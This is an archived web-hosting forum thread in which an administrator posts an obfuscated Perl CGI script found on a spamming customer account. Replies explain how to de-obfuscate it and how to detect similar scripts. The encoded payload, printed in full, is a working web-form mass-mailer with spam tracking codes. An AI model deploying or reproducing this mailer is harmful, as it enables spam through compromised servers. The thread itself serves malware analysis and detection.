Knowledgebase

Knowledgebase

Portal Home > Knowledgebase > Articles Database > Can anyone share what the meaning of this code?


Can anyone share what the meaning of this code?




Posted by pmabraham, 06-21-2008, 02:26 PM
Greetings: Can anyone share the meaning of this code? #!/usr/bin/perl eval(unpack ('u*', <<'nlyypFkusaSx')); M5%)2G9W4R@D*7ML;V-A;"@D7E2`DS$L-C!]*2]G5%)2G9W4R@D<&UD9TM.<&5G05E0*2D[ nlyypFkusaSx __DATA__ JnJlYWRwb3N0OyRhZHZlcnRfaWQ9InZvcnNwYW0yMDAzIjskc3BhbWtleT0iWFo5MzgyIjskc2Vw YXJhdG9yPSJ8IjskbWFpbF9wcm9nID0gIi91c3Ivc2Jpbi9zZW5kbWFpbCI7JHRpbWUgPSB0aW1l OyRyZXNldF9vZmZzZXQgPSAkcmVzZXRfb2Zmc2V0ICogMzYwMDskdGltZSA9ICR0aW1lICsgJHJl c2V0X29mZnNldDsoJHNlYywkbWluLCRob3VyLCRtZGF5LCRtb24sJHllYXIsJHdkYXksJHlkYXks JGlzZHN0KSA9IGxvY2FsdGltZSgkdGltZSk7JGhvdXIxPSRob3VyKzE7CiRtb24rKzskeWVhciAr PSAxOTAwOyRub3cgPSAiJG1vbi4kbWRheS4keWVhciI7JHN1bmRheSA9ICR5ZGF5IC0gJHdkYXk7 JGN1cnJlbnRfdGltZSA9IHRpbWUoKTt1bmxlc3MgKCRJTlBVVHsnaW5wdXRhcmVhJ30peyAmaW5w dXRmb3JtOyB9QG1haWxsaXN0PXNwbGl0KC9cbi8sJElOUFVUeydpbnB1dGFyZWEnfSk7JG1lc3Nh Z2U9JElOUFVUeydtZXNzYWdlYXJlYSd9OyRmcm9tPSRJTlBVVHsnZnJvbSd9OyRyZXBseXRvPSRJ TlBVVHsncmVwbHktdG8nfTsKJHN1YmplY3Q9JElOUFVUeydzdWJqZWN0J307dW5sZXNzICgkcmVw bHl0byl7ICRyZXBseXRvPSRmcm9tOyB9JGNudHQ9MDtmb3JlYWNoICRsaW5lKEBtYWlsbGlzdCl7 JG1zZ2c9IiI7JGNvZGU9IiI7JGVtYWlsPSIiO2Nob21wKCRsaW5lKTskbGluZT1+cy9cci8vO2lm ICgkbGluZT1+L1w7Lyl7QHR0dHQ9c3BsaXQoL1w7LywkbGluZSk7JGVtYWlsPSR0dHR0WzBdO31l bHNleyAkZW1haWw9JGxpbmU7IH0KJGNvZGU9Z2VuZXJhdGUoJGVtYWlsKTskbXNnZz0kbWVzc2Fn ZTskbXNnZz1+IHMvXFtjb2RlXF0vJGNvZGUvZztpZiAoJHVzZV9zbXRwY2xpZW50KXsmc2VuZHNt dHBjbGllbnQ7fWVsc2V7JnNlbmRtYWlsO30kY250dCsrO31wcmludCAiQ29udGVudC10eXBlOiB0 ZXh0L3BsYWluXG5cblxuIjtwcmludCAiJGNudHQgbWFpbHMgaGFzIGJlZW4gc2VudCI7ZXhpdDtz dWIgc2VuZG1haWwge29wZW4oTUFJTCwgInwkbWFpbF9wcm9nIC10IikgfHwgJmVycm9yKCJDb3Vs ZCBub3Qgc2VuZCBvdXQgZW1haWwgPCEtLSAkbWFpbF9wcm9nIC0tPiIpOwpwcmludCBNQUlMICJU bzogJGVtYWlsIFxuIjtwcmludCBNQUlMICJSZXBseS1UbzogJHJlcGx5dG9cbiI7cHJpbnQgTUFJ TCAiRnJvbTogJGZyb20gXG4iO3ByaW50IE1BSUwgIlN1YmplY3Q6ICRzdWJqZWN0IFxuXG4iO3By aW50IE1BSUwgJG1zZ2c7cHJpbnQgTUFJTCAiXG5cbiI7Y2xvc2UgKE1BSUwpOwp9c3ViIHNlbmRz bXRwY2xpZW50e215ICRtZXNzYWdlPSRtc2dnOyRob3N0ID0gJGVtYWlsOyRob3N0ID1+IHMvXltf XC4wLTlhLXotXStcQC8vOyRoZWxvX3N0cmluZz0iaG9wZS5teWlkZWFsaG9zdC5jb20iO0Btb250 aHMgPSAoJ0phbicsJ0ZlYicsJ01hcicsJ0FwcicsJ01heScsJ0p1bicsJ0p1bCcsJ0F1ZycsJ1Nl cCcsJ09jdCcsJ05vdicsJ0RlYycpOyRtb250aD0kbW9uLTE7bXkgJG1lc3N1c2VyPSJEYXRlOiAk bWRheSAkbW9udGhzWyRtb250aF0gJHllYXIgJGhvdXI6JG1pbjokc2VjIC0wNDAwXG5Gcm9tOiAk ZnJvbVxuVG86ICRlbWFpbFxuU3ViamVjdDogJHN1YmplY3RcbkNvbnRlbnQtVHlwZTogdGV4dC9w bGFpbjsgY2hhcnNldD11cy1hc2NpaVxuXG4iLiRtZXNzYWdlOwpvcGVuKE1FU1MsICJ8ICRzbXRw Y2xpZW50IC1IICRoZWxvX3N0cmluZyAtZCAkaG9zdCAtZiAkZnJvbSAtdCAkZW1haWwiKSBvciBk aWUgIkNhbid0IG9wZW4gdG1wIGZpbGVcbiI7CnByaW50IE1FU1MgJG1lc3N1c2VyOyRyZXN1bHQg PSBjbG9zZShNRVNTKTt9c3ViIGdlbmVyYXRle215ICRlbWFpbD0kX1swXTskZW1haWw9IlxMJGVt YWlsXEUiO215ICRtcDVjb2RlID0gbWQ1X21ha2UoJGN1cnJlbnRfdGltZS4iLSIuJGFkdmVydF9p ZC4iLSIuJHNwYW1rZXkuIi0iLiRlbWFpbCk7Cm15ICRlbmNvZGVkID0gZW5jb2RlKCRlbWFpbC4i Ojo6Ii4kbXA1Y29kZS4iOjo6Ii4kY3VycmVudF90aW1lLiI6OjoiKTtyZXR1cm4gInNpZFw9Ii4k ZW5jb2RlZDt9c3ViIG1kNV9tYWtle215ICRzdHJpbmcgID0gJF9bMF07cmVxdWlyZSBEaWdlc3Q6 Ok1ENTskbWQ1ID0gRGlnZXN0OjpNRDUtPm5ldzskbWQ1LT5hZGQoJHN0cmluZyk7CiRkaWdlc3Qg PSAkbWQ1LT5oZXhkaWdlc3Q7JGRpZ2VzdCA9IHVjKCRkaWdlc3QpO3JldHVybiAkZGlnZXN0O31z dWIgZW5jb2RlICgkOyQpe215ICRyZXMgPSAiIjtteSAkZW9sID0gJF9bMV07JGVvbCA9ICJcbiIg dW5sZXNzIGRlZmluZWQgJGVvbDtwb3MoJF9bMF0pID0gMDsgICAgICAgICAgICAgICAgICAgICAg ICAgCndoaWxlICgkX1swXSA9fiAvKC57MSw0NX0pL2dzKSB7JHJlcyAuPSBzdWJzdHIocGFjaygn dScsICQxKSwgMSk7Y2hvcCgkcmVzKTt9JHJlcyA9fiB0cnxgIC1ffEFBLVphLXowLTkrL3w7ICAg ICAgICAgICAgICAKIyBmaXggcGFkZGluZyBhdCB0aGUgZW5kCm15ICRwYWRkaW5nID0gKDMgLSBs ZW5ndGgoJF9bMF0pICUgMykgJSAzOyRyZXMgPX4gcy8ueyRwYWRkaW5nfSQvJz0nIHggJHBhZGRp bmcvZSBpZiAkcGFkZGluZzsjIGJyZWFrIGVuY29kZWQgc3RyaW5nIGludG8gbGluZXMgb2Ygbm8g bW9yZSB0aGFuIDc2IGNoYXJhY3RlcnMgZWFjaAokcmVzO31zdWIgaW5wdXRmb3Jte3ByaW50ICJD b250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iO3ByaW50IDw8RU9GOwoKPGZvcm0gbWV0aG9kPXBv c3Q+CkVudGVyIGFuIGVtYWlsIGxpc3QgaW4gdGhlIGZvbGxvd2luZyBmb3JtYXQ6PGJyPgpFTUFJ TFMgSEVSRTo8YnI+CjxURVhUQVJFQSBOQU1FPWlucHV0YXJlYSBST1dTPTE4IENPTFM9NTA+PC9U RVhUQVJFQT4KPGJyPjxicj4KRlJPTSBFTUFJTDo8YnI+CjxJTlBVVCB0eXBlPSJURVhUIiBuYW1l PSJmcm9tIiB2YWx1ZT0iIiBzaXplPSIyMCI+IAo8YnI+CipSRVBMWSBUTzo8YnI+CjxJTlBVVCB0 eXBlPSJURVhUIiBuYW1lPSJyZXBseS10byIgdmFsdWU9IiIgc2l6ZT0iMjAiPiAKPGJyPgpTVUJK RUNUOjxicj4KPElOUFVUIHR5cGU9IlRFWFQiIG5hbWU9InN1YmplY3QiIHZhbHVlPSIiIHNpemU9 IjIwIj4gCjxicj4KVEVYVCBNRVNTQUdFIEhFUkUgKG5vIGh0bWwhKTo8YnI+CjxURVhUQVJFQSBO QU1FPW1lc3NhZ2VhcmVhIFJPV1M9MjIgQ09MUz0xMDA+PC9URVhUQVJFQT4KCjxJTlBVVCBUWVBF PVNVQk1JVCBOQU1FPSJHTyIgVkFMVUU9IlNFTkQiPgo8L2Zvcm0+CgpFT0YKZXhpdDt9c3ViIHJl YWRwb3N0e3JlYWQoU1RESU4sICRidWZmZXIsICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pO0BwYWly cyA9IHNwbGl0KC8mLywgJGJ1ZmZlcik7Zm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7KCRuYW1lLCAk dmFsdWUpID0gc3BsaXQoLz0vLCAkcGFpcik7CiR2YWx1ZSA9fiB0ci8rLyAvOyR2YWx1ZSA9fiBz LyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnO2lmICgkSU5Q VVR7JG5hbWV9KSB7ICRJTlBVVHskbmFtZX0gPSAkSU5QVVR7JG5hbWV9LiIsIi4kdmFsdWU7IH1l bHNlIHsgJElOUFVUeyRuYW1lfSA9ICR2YWx1ZTsgfX19 Thank you.
Posted by masfenix, 06-21-2008, 02:28 PM
Thats not code, and even if it was, its encrypted./
Posted by foobic, 06-21-2008, 10:30 PM
Not encrypted, just obfuscated. Last edited by foobic; 06-21-2008 at 10:41 PM. Reason: Added indentation
Posted by bear, 06-21-2008, 10:36 PM
Interesting...how was that done, Chris, the de-obfuscation? ...says bear who doesn't know much about PERL
Posted by foobic, 06-21-2008, 10:45 PM
Not much to it - perl like HTML is plain text, so this sort of thing decodes just like the useless javascript HTML obfuscators. 1. change the first "eval" to "print" - shows what the first bit is doing. This turns out to be reading the data part, decoding and evaling it. 2. change the final eval in the decoded first part to a print, which produces the above (what the code is trying to eval).
Posted by bear, 06-21-2008, 11:07 PM
You change then run it, or is there some intermediary script that outputs the content?
Posted by foobic, 06-21-2008, 11:56 PM
Yes, change and then run - the decoding is done by perl itself. Just don't let it run an eval statement.
Posted by pmabraham, 06-22-2008, 07:19 AM
Greetings Chris: Thank you very much. One of our customers had a lot of spamming going on through a web sever, and we tracked it to a user account where the main suspicious content was a perl program named t.cgi. Is there anything common, pattern-based, about the obfuscated code that one could search a server on with a good hope to catch other obfuscated programs that are of similar (aka spammer) nature? Thank you again.
Posted by foobic, 06-22-2008, 08:48 AM
You're welcome, Peter. Since the encoding method could take any form I doubt you'll have much luck looking for patterns like the coded form of "/usr/sbin/sendmail" in the data. The one thing it depends on is that first "eval", so maybe you could run an automated search for similar stealth scripts by looking for the presence of at least one "eval". There are ways to do this without using eval though, and in any case you'd probably want something more selective. Perhaps you could look at the density of the common functions, keywords and special characters, eg. in a perl script count the number of $ @ { } if else sub use require etc. and divide by the file size. Run the analysis on a collection of normal scripts to get an idea of the range of densities for innocent programs, then flag anything that falls outside the range. HTH


Was this answer helpful?

Add to Favourites Add to Favourites    Print this Article Print this Article

Also Read
Tomcat (Java Servlet) Reseller? (Views: 797)
Report abuse? (Views: 825)
Levi 1 (Views: 797)
Cpanel and xcache (easy apache) (Views: 786)
Burst.net Down? (Views: 849)


Language:

LoadingRetrieving latest tweet...

Client Navigation
Useful Pages
Support Center
About 02link

02link provides enterprise hosting and server services at an amazing price. Don't see something that suits your needs? Get a free custom quote from one of our hosting experts.

Back to Top Copyright © 2018 DC International LLC. - All Rights Reserved.